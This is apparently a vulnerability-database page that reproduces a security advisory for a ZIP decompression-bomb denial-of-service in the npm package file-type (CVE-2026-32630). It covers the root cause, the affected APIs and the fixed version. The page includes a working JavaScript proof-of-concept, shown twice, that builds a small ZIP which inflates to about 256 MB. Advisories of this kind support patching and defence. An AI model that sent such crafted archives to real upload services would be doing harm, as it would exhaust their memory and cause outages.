GHSA-J47W-4G3G-C36V

Vulnerability from github – Published: 2026-03-13 20:56 – Updated: 2026-03-16 21:59
VLAI?
Summary
file-type: ZIP Decompression Bomb DoS via [Content_Types].xml entry
Details

Summary

A crafted ZIP file can trigger excessive memory growth during type detection in file-type when using fileTypeFromBuffer(), fileTypeFromBlob(), or fileTypeFromFile().

In affected versions, the ZIP inflate output limit is enforced for stream-based detection, but not for known-size inputs. As a result, a small compressed ZIP can cause file-type to inflate and process a much larger payload while probing ZIP-based formats such as OOXML. In testing on file-type 21.3.1, a ZIP of about 255 KB caused about 257 MB of RSS growth during fileTypeFromBuffer().

This is an availability issue. Applications that use these APIs on untrusted uploads can be forced to consume large amounts of memory and may become slow or crash.

Root Cause

The ZIP detection logic applied different limits depending on whether the tokenizer had a known file size.

For stream inputs, ZIP probing was bounded by maximumZipEntrySizeInBytes (1 MiB). For known-size inputs such as buffers, blobs, and files, the code instead used Number.MAX_SAFE_INTEGER in two relevant places:

const maximumContentTypesEntrySize = hasUnknownFileSize(tokenizer)
    ? maximumZipEntrySizeInBytes
    : Number.MAX_SAFE_INTEGER;

and:

const maximumLength = hasUnknownFileSize(this.tokenizer)
    ? maximumZipEntrySizeInBytes
    : Number.MAX_SAFE_INTEGER;

Together, these checks allowed a crafted ZIP to bypass the intended inflate limit for known-size APIs and force large decompression during detection of entries such as [Content_Types].xml.

Proof of Concept

import {fileTypeFromBuffer} from 'file-type';
import archiver from 'archiver';
import {Writable} from 'node:stream';

async function createZipBomb(sizeInMegabytes) {
    return new Promise((resolve, reject) => {
        const chunks = [];
        const writable = new Writable({
            write(chunk, encoding, callback) {
                chunks.push(chunk);
                callback();
            },
        });

        const archive = archiver('zip', {zlib: {level: 9}});
        archive.pipe(writable);
        writable.on('finish', () => {
            resolve(Buffer.concat(chunks));
        });
        archive.on('error', reject);

        const xmlPrefix = '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">';
        const padding = Buffer.alloc(sizeInMegabytes * 1024 * 1024 - xmlPrefix.length, 0x20);
        archive.append(Buffer.concat([Buffer.from(xmlPrefix), padding]), {name: '[Content_Types].xml'});
        archive.finalize();
    });
}

const zip = await createZipBomb(256);
console.log('ZIP size (KB):', (zip.length / 1024).toFixed(0));

const before = process.memoryUsage().rss;
await fileTypeFromBuffer(zip);
const after = process.memoryUsage().rss;

console.log('RSS growth (MB):', ((after - before) / 1024 / 1024).toFixed(0));

Observed on file-type 21.3.1: - ZIP size: about 255 KB - RSS growth during detection: about 257 MB

Affected APIs

Affected: - fileTypeFromBuffer() - fileTypeFromBlob() - fileTypeFromFile()

Not affected: - fileTypeFromStream(), which already enforced the ZIP inflate limit for unknown-size inputs

Impact

Applications that inspect untrusted uploads with fileTypeFromBuffer(), fileTypeFromBlob(), or fileTypeFromFile() can be forced to consume excessive memory during ZIP-based type detection. This can degrade service or lead to process termination in memory-constrained environments.

Cause

The issue was introduced in 399b0f1

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 21.3.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "file-type"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "20.0.0"
            },
            {
              "fixed": "21.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32630"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-409"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:56:05Z",
    "nvd_published_at": "2026-03-16T14:19:40Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nA crafted ZIP file can trigger excessive memory growth during type detection in `file-type` when using `fileTypeFromBuffer()`, `fileTypeFromBlob()`, or `fileTypeFromFile()`.\n\nIn affected versions, the ZIP inflate output limit is enforced for stream-based detection, but not for known-size inputs. As a result, a small compressed ZIP can cause `file-type` to inflate and process a much larger payload while probing ZIP-based formats such as OOXML. In testing on `file-type` `21.3.1`, a ZIP of about `255 KB` caused about `257 MB` of RSS growth during `fileTypeFromBuffer()`.\n\nThis is an availability issue. Applications that use these APIs on untrusted uploads can be forced to consume large amounts of memory and may become slow or crash.\n\n## Root Cause\n\nThe ZIP detection logic applied different limits depending on whether the tokenizer had a known file size.\n\nFor stream inputs, ZIP probing was bounded by `maximumZipEntrySizeInBytes` (`1 MiB`). For known-size inputs such as buffers, blobs, and files, the code instead used `Number.MAX_SAFE_INTEGER` in two relevant places:\n\n```js\nconst maximumContentTypesEntrySize = hasUnknownFileSize(tokenizer)\n\t? maximumZipEntrySizeInBytes\n\t: Number.MAX_SAFE_INTEGER;\n```\n\nand:\n\n```js\nconst maximumLength = hasUnknownFileSize(this.tokenizer)\n\t? maximumZipEntrySizeInBytes\n\t: Number.MAX_SAFE_INTEGER;\n```\n\nTogether, these checks allowed a crafted ZIP to bypass the intended inflate limit for known-size APIs and force large decompression during detection of entries such as `[Content_Types].xml`.\n\n## Proof of Concept\n\n```js\nimport {fileTypeFromBuffer} from \u0027file-type\u0027;\nimport archiver from \u0027archiver\u0027;\nimport {Writable} from \u0027node:stream\u0027;\n\nasync function createZipBomb(sizeInMegabytes) {\n\treturn new Promise((resolve, reject) =\u003e {\n\t\tconst chunks = [];\n\t\tconst writable = new Writable({\n\t\t\twrite(chunk, encoding, callback) {\n\t\t\t\tchunks.push(chunk);\n\t\t\t\tcallback();\n\t\t\t},\n\t\t});\n\n\t\tconst archive = archiver(\u0027zip\u0027, {zlib: {level: 9}});\n\t\tarchive.pipe(writable);\n\t\twritable.on(\u0027finish\u0027, () =\u003e {\n\t\t\tresolve(Buffer.concat(chunks));\n\t\t});\n\t\tarchive.on(\u0027error\u0027, reject);\n\n\t\tconst xmlPrefix = \u0027\u003c?xml version=\"1.0\"?\u003e\u003cTypes xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"\u003e\u0027;\n\t\tconst padding = Buffer.alloc(sizeInMegabytes * 1024 * 1024 - xmlPrefix.length, 0x20);\n\t\tarchive.append(Buffer.concat([Buffer.from(xmlPrefix), padding]), {name: \u0027[Content_Types].xml\u0027});\n\t\tarchive.finalize();\n\t});\n}\n\nconst zip = await createZipBomb(256);\nconsole.log(\u0027ZIP size (KB):\u0027, (zip.length / 1024).toFixed(0));\n\nconst before = process.memoryUsage().rss;\nawait fileTypeFromBuffer(zip);\nconst after = process.memoryUsage().rss;\n\nconsole.log(\u0027RSS growth (MB):\u0027, ((after - before) / 1024 / 1024).toFixed(0));\n```\n\nObserved on `file-type` `21.3.1`:\n- ZIP size: about `255 KB`\n- RSS growth during detection: about `257 MB`\n\n## Affected APIs\n\nAffected:\n- `fileTypeFromBuffer()`\n- `fileTypeFromBlob()`\n- `fileTypeFromFile()`\n\nNot affected:\n- `fileTypeFromStream()`, which already enforced the ZIP inflate limit for unknown-size inputs\n\n## Impact\n\nApplications that inspect untrusted uploads with `fileTypeFromBuffer()`, `fileTypeFromBlob()`, or `fileTypeFromFile()` can be forced to consume excessive memory during ZIP-based type detection. This can degrade service or lead to process termination in memory-constrained environments.\n\n## Cause\n\nThe issue was introduced in 399b0f1",
  "id": "GHSA-j47w-4g3g-c36v",
  "modified": "2026-03-16T21:59:48Z",
  "published": "2026-03-13T20:56:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sindresorhus/file-type/security/advisories/GHSA-j47w-4g3g-c36v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32630"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sindresorhus/file-type/commit/399b0f156063f5aeb1c124a7fd61028f3ea7c124"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sindresorhus/file-type/commit/a155cd71323279de173c54e8c530d300d3854fdd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sindresorhus/file-type"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sindresorhus/file-type/releases/tag/v21.3.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "file-type: ZIP Decompression Bomb DoS via [Content_Types].xml entry"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…